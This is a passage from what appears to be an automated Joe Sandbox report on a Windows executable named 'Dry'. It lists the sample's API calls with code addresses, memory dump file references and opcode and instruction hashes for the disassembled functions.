                                                                                                                                                                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B61B6F
                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00B61B7E
                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00B61C26
                                                                                                                                                                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 00B61C56
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2675159561-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 1ae25667d7ffce11e10ac3680815aceeefdcd425688240af708eb7bc52d8f1ff
                                                                                                                                                                                                                                                                                    • Instruction ID: 01f852010f1e60d7d4067667ed16152873e5c4e54df2666d1c382b7fb873ade2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ae25667d7ffce11e10ac3680815aceeefdcd425688240af708eb7bc52d8f1ff
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0041E731600104AFDB10DF28C885BADB7E9EF45364F188499F8099F292DB74ED81CBE1
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B4D7CD,?), ref: 00B4E714
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B4D7CD,?), ref: 00B4E72D
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00B4D7F0
                                                                                                                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00B4D82A
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B4D8B0
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B4D8C6
                                                                                                                                                                                                                                                                                    • SHFileOperationW.SHELL32(?), ref: 00B4D90C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                                                                                    • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                                    • Opcode ID: 42fb350e222492a5dcda21e781a17a7020169005d5882651a8ec91c6409e2f0a
                                                                                                                                                                                                                                                                                    • Instruction ID: 0bc9094023b0be35b824081ab00158c9c57c0aa29d0d9e77763d7605754e0cc3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42fb350e222492a5dcda21e781a17a7020169005d5882651a8ec91c6409e2f0a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F4147719052189EDF12EBA4D985BEE77F8EF08340F1004E6E509EB141EB35A788DB50
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00B738B8
                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00B738EB
                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00B73920
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00B73952
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00B7397C
                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00B7398D
                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B739A7
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                                    • Opcode ID: a80678307436c328f808a15e4002aecc2166165b6e27d5c0a23aa30c4f5a2b15
                                                                                                                                                                                                                                                                                    • Instruction ID: c5d0ba96a9d8b0362c57f52b11c6683c28f7d39e7b08f5bee6ebed15efb5d756
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a80678307436c328f808a15e4002aecc2166165b6e27d5c0a23aa30c4f5a2b15
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81313C31704255AFDB21CF48DC89F6437E1FB86B50F1541A4F6698B2B1CBB1AD84EB01
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B480D0
                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B480F6
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00B480F9
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00B48117
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00B48120
                                                                                                                                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00B48145
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00B48153
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 1f79f02869cd6da3c490eaedae4703ce5e3fb318f28c0f93fd8bf5d9ba0a5a75
                                                                                                                                                                                                                                                                                    • Instruction ID: 086919092682bc2e9dc091c844063dbb6f8631a27fc3fe7a32a8e93aa46765eb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f79f02869cd6da3c490eaedae4703ce5e3fb318f28c0f93fd8bf5d9ba0a5a75
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6219772600219AFDF10DFA8CC84DBE77ECEF093607048466F915EB290DA70DD869760
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B481A9
                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B481CF
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00B481D2
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32 ref: 00B481F3
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32 ref: 00B481FC
                                                                                                                                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00B48216
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00B48224
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 9cf5ebc3d6c22a8b25e43d03f6ad9eedc3cdb60d9ab9e157d6cf13697d154f3c
                                                                                                                                                                                                                                                                                    • Instruction ID: b49c5637ff28d83640ef4a5db96c16813bd9e35f108d5e532027bb328a04bf2f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9cf5ebc3d6c22a8b25e43d03f6ad9eedc3cdb60d9ab9e157d6cf13697d154f3c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2521A135604604BFDB10AFA8DC88DAE77ECEF093607008165F905DB2A0DEB0ED81DB64
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00B50E99
                                                                                                                                                                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B50ED5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                    • String ID: nul
                                                                                                                                                                                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                    • Opcode ID: 15cbeb96be7d5ae02d54a146278f195e6918bd71ba943f7f9026da6f4c7f1bf8
                                                                                                                                                                                                                                                                                    • Instruction ID: 12a02fe6cab15944e8563c2771c89d79c3147cac87fa9941aa1e8790d0a8ab24
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15cbeb96be7d5ae02d54a146278f195e6918bd71ba943f7f9026da6f4c7f1bf8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5215C7051430AABDB20AF24DC45B9A77F8EF54761F204AE9FCA5E72D0EB709845CB50
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00B50F6D
                                                                                                                                                                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B50FA8
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                    • String ID: nul
                                                                                                                                                                                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                    • Opcode ID: 06ce6946756e17cdd35912c4b08d2966a6a856ac4f355dff677f3c18b76e5767
                                                                                                                                                                                                                                                                                    • Instruction ID: 889f8a40e5079a7c203b52cd8f92598426376b0bfb266a4a81b0770dfb4d0c7a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06ce6946756e17cdd35912c4b08d2966a6a856ac4f355dff677f3c18b76e5767
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE219C31644345ABDB209F68CC04B9A77F8FF55762F240A99FCA1E32D0DB709888DB50
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AE78B1
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE7873: GetStockObject.GDI32(00000011), ref: 00AE78C5
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AE78CF
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B74BB0
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B74BBD
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B74BC8
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B74BD7
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B74BE3
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                                    • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                                    • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                                    • Opcode ID: f9426164a946a2104da2777ab8b41549488438f59dd75d8612710c123eda6a6d
                                                                                                                                                                                                                                                                                    • Instruction ID: 84a18aed89f7794617f398b437bb8239a51524f31c2378c934f70b28b70b66cb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9426164a946a2104da2777ab8b41549488438f59dd75d8612710c123eda6a6d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C51193B1140219BEEF119F65CC85EEB7FADEF08798F018110B618A2160CB72DC619BA0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B1DB23: _free.LIBCMT ref: 00B1DB4C
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1DBAD
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B12D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B1DB51,00BB1DC4,00000000,00BB1DC4,00000000,?,00B1DB78,00BB1DC4,00000007,00BB1DC4,?,00B1DF75,00BB1DC4), ref: 00B12D4E
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B12D38: GetLastError.KERNEL32(00BB1DC4,?,00B1DB51,00BB1DC4,00000000,00BB1DC4,00000000,?,00B1DB78,00BB1DC4,00000007,00BB1DC4,?,00B1DF75,00BB1DC4,00BB1DC4), ref: 00B12D60
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1DBB8
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1DBC3
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1DC17
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1DC22
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1DC2D
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1DC38
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                                    • Instruction ID: 777f34e0dc75cbcd9e4d70399914194c59848d48c4757ff1a8c3fe362d359794
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD1163B2546B04BAD520BBB0DC07FCB77DC9F04700FC10CE9B29AAA152DA75B6958750
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B4E328
                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 00B4E32F
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B4E345
                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 00B4E34C
                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B4E390
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00B4E36D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                                    • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                                                                    • Opcode ID: bc7176139ee1e47df0e34afe9f5febd1ade45d1e751f9ed70978e67841acfc60
                                                                                                                                                                                                                                                                                    • Instruction ID: 5fd36e7c2c55a25326e0de0b78557ac25591ed504b1f5eaa04a8bfcb4a9d4787
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc7176139ee1e47df0e34afe9f5febd1ade45d1e751f9ed70978e67841acfc60
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94016DF29002087FE712ABA48D89EEA77BCEB08740F4045D5B74AE7041EA74DE849B75
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00B51322
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,?), ref: 00B51334
                                                                                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,000001F6), ref: 00B51342
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00B51350
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B5135F
                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B5136F
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000), ref: 00B51376
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 79a2dfbd64661dd16d22b107dcbb3082f0464df37a32a5831512af8e17ee628b
                                                                                                                                                                                                                                                                                    • Instruction ID: 1137f05b7a0fb7eb4d0de301c923fe73799236db956260304f746d1c3600bb6d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79a2dfbd64661dd16d22b107dcbb3082f0464df37a32a5831512af8e17ee628b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9F0C932042612FBD7411B54EE49BD6BB79FF04342F401561F10696CB18F7495A5CF94
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00B6281D
                                                                                                                                                                                                                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00B6283E
